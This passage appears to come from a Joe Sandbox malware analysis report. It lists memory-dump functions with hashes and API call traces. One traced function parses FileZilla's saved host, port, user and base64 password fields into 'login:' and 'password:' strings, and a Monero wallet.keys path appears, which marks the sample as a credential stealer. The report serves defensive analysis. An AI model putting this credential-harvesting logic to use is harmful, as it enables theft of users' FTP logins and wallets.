                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotect
                    • String ID:
                    • API String ID: 2068576380-0
                    • Opcode ID: 75dcce5789ae37f69f63c7ae5db9036fd85f3405c11b76155ce8f95d3e6fd404
                    • Instruction ID: fd43f704b046eed256b9bd25496f310c3f695a14451ee002e29f0f16dfa71ff1
                    • Opcode Fuzzy Hash: 75dcce5789ae37f69f63c7ae5db9036fd85f3405c11b76155ce8f95d3e6fd404
                    • Instruction Fuzzy Hash: 8A11CCB4A00209DFDB04DF94D985AAE77B9FF89300F104559ED15A7350D774AE14CFA1
                    Function 00CEBD1B Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: My F
                    • API String ID: 0-421645348
                    • Opcode ID: 42328410bdaaaec99b2a5d9c00073069868d81ec34532b7048c1fbb839f82a08
                    • Instruction ID: d2ebbbc970ad5170afdb49a210b8e04db02e2d9ac995a6e90ac28a2e64ae675e
                    • Opcode Fuzzy Hash: 42328410bdaaaec99b2a5d9c00073069868d81ec34532b7048c1fbb839f82a08
                    • Instruction Fuzzy Hash: B57106B35086149FE3046F29DC5577AFBE5EF94320F2B492EEAC5D7680EA354840CB92
                    Function 00C73FE3 Relevance: .2, Instructions: 246COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8bd9145009b2ccfa43aa7a8b3310aa9d4c8b2f90fe26d4d197177a9fe3d63ab3
                    • Instruction ID: 4686fead0cea93abaad43ed8e51a4ea4f03ad4704589be9af6fa19877b592171
                    • Opcode Fuzzy Hash: 8bd9145009b2ccfa43aa7a8b3310aa9d4c8b2f90fe26d4d197177a9fe3d63ab3
                    • Instruction Fuzzy Hash: 6271F9F3E087145BE3006E2DED8476ABBD9DB94720F1B453DDA98D3781E9798C0542D2
                    Function 00D0FEE2 Relevance: .2, Instructions: 227COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f903312c1b2d15997ef6ef8a7c41b5eee3d6a91078d4350e4033b00f5d6216ce
                    • Instruction ID: 6f73be660f11506dcc25bb8539e40cc188240515205ee8e97fe78f03080b173a
                    • Opcode Fuzzy Hash: f903312c1b2d15997ef6ef8a7c41b5eee3d6a91078d4350e4033b00f5d6216ce
                    • Instruction Fuzzy Hash: 4071E6F39092009FE3086E29DC9577AFBE5EB94320F1B893DD9C487784EA7958458783
                    Function 00CA720A Relevance: .2, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b064f2393d20be698d73df10f884694e06b5b03037603c0fbf9ce2f386b042f4
                    • Instruction ID: 8ad15a2bc8406b67566ea6c8493e5ae95b088edf3d2c9fc43be15152d4445150
                    • Opcode Fuzzy Hash: b064f2393d20be698d73df10f884694e06b5b03037603c0fbf9ce2f386b042f4
                    • Instruction Fuzzy Hash: DF6146F3A082145BE7086E7CDC5977ABB95EB44320F1B463CDAC997BC4E935580482C2
                    Function 00D1CD68 Relevance: .2, Instructions: 178COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aa1d98dff09924f9037a4d2cb3e6e3fc2d6e62faa04550f46f80b71f4698ca4a
                    • Instruction ID: 2693e892d55b7f12b5844fe6c66abcb70c19e6ef1f4526caeef78a542e4986b9
                    • Opcode Fuzzy Hash: aa1d98dff09924f9037a4d2cb3e6e3fc2d6e62faa04550f46f80b71f4698ca4a
                    • Instruction Fuzzy Hash: B45158F360D2049BE3047E3EDC8565AF7EAEFD8620F1A852DEA88C3744F63499058756
                    Function 00CA7A04 Relevance: .2, Instructions: 170COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f8b7bdb24603c6874454604505acafdebbf7d66c0b5b230cbcc5b77ed72e4d58
                    • Instruction ID: 77a666c427d0bb4a6a9b9dc7668ee1b45afbe17e8535b6d90382cbd4dbcecfee
                    • Opcode Fuzzy Hash: f8b7bdb24603c6874454604505acafdebbf7d66c0b5b230cbcc5b77ed72e4d58
                    • Instruction Fuzzy Hash: 825127F3E082185BE3086A19EC8177AB7D9EB44710F1A453DEE89D3781E9369C0187C6
                    Function 00CD1A60 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6a0f816eecc56066f7b7370031aa74fb1879d192067896bbd58c0886f7f80b39
                    • Instruction ID: 710f855535e877cf5013267b6f407679bbfd9c6928ef1097af1edf8e0ae674bd
                    • Opcode Fuzzy Hash: 6a0f816eecc56066f7b7370031aa74fb1879d192067896bbd58c0886f7f80b39
                    • Instruction Fuzzy Hash: D341E6F3B092049BF3046D2ADC8976ABBD7EBD4320F2B463DDA99477C0D938540A8656
                    Function 00C23F46 Relevance: .2, Instructions: 157COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2eeea90d87fbe40ba50049200a804fd4df1859526d59554b4f88d7d665cdcf79
                    • Instruction ID: 079cc94c7a55bc571f2c8db4161bcf551302fc84c4390d81fd44949eeb317ad1
                    • Opcode Fuzzy Hash: 2eeea90d87fbe40ba50049200a804fd4df1859526d59554b4f88d7d665cdcf79
                    • Instruction Fuzzy Hash: EA4115F3E182105FF3049A29DC8436AB3D6EBD4720F2B853DEAAC83384D9795C058786
                    Function 00969750 Relevance: .0, Instructions: 15COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    Function 00960250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 00968DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00968E0B
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                      • Part of subcall function 009599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                      • Part of subcall function 009599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                      • Part of subcall function 009599C0: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                      • Part of subcall function 009599C0: LocalFree.KERNEL32(0095148F), ref: 00959A90
                      • Part of subcall function 009599C0: CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                      • Part of subcall function 00968E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00968E52
                    • GetProcessHeap.KERNEL32(00000000,000F423F,00970DBA,00970DB7,00970DB6,00970DB3), ref: 00960362
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00960369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00960385
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 00960393
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 009603CF
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 009603DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00960419
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 00960427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00960463
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 00960475
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 00960502
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 0096051A
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 00960532
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 0096054A
                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00960562
                    • lstrcat.KERNEL32(?,profile: null), ref: 00960571
                    • lstrcat.KERNEL32(?,url: ), ref: 00960580
                    • lstrcat.KERNEL32(?,00000000), ref: 00960593
                    • lstrcat.KERNEL32(?,00971678), ref: 009605A2
                    • lstrcat.KERNEL32(?,00000000), ref: 009605B5
                    • lstrcat.KERNEL32(?,0097167C), ref: 009605C4
                    • lstrcat.KERNEL32(?,login: ), ref: 009605D3
                    • lstrcat.KERNEL32(?,00000000), ref: 009605E6
                    • lstrcat.KERNEL32(?,00971688), ref: 009605F5
                    • lstrcat.KERNEL32(?,password: ), ref: 00960604
                    • lstrcat.KERNEL32(?,00000000), ref: 00960617
                    • lstrcat.KERNEL32(?,00971698), ref: 00960626
                    • lstrcat.KERNEL32(?,0097169C), ref: 00960635
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00970DB2), ref: 0096068E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
